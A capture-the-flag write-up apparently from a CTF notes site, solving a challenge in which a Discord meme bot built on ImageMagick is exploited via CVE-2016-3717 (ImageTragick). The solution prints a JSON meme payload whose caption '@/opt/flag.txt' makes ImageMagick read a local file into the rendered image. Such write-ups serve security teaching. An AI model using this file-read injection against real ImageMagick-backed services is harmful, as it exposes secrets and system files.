MDL Considered Harmful

ImageMagick CVE-2016-3717

Problem

There's a bot named MDLChef in the Discord. You need to DM it, it doesn't respond in the server. On its host machine, there's a file at /opt/flag.txt - it contains the flag. Go get it.

Note: This is NOT an OSINT challenge. The source code really isn't available. Good luck.

Author: nb

Solution

If we use the /credits command, we can understand more of the stack.

We can see that ImageMagick is used.

I searched for ImageMagick exploits, and found https://imagetragick.com/.

It appears that if we use caption:@/path/to/file, we can read arbitrary files.

{
    version: "MDL/1.1",
    type: "meme",
    base: {
        format: "Meme.Legacy.BadLuckBrian"
    },
    caption: {
        topText: "@/opt/flag.txt",
        bottomText: "image tragick"
    }
}

The rendered image contains the flag:

PreviousBack to the Lab 2 NextReally Secure Algorithm

Last updated 2 years ago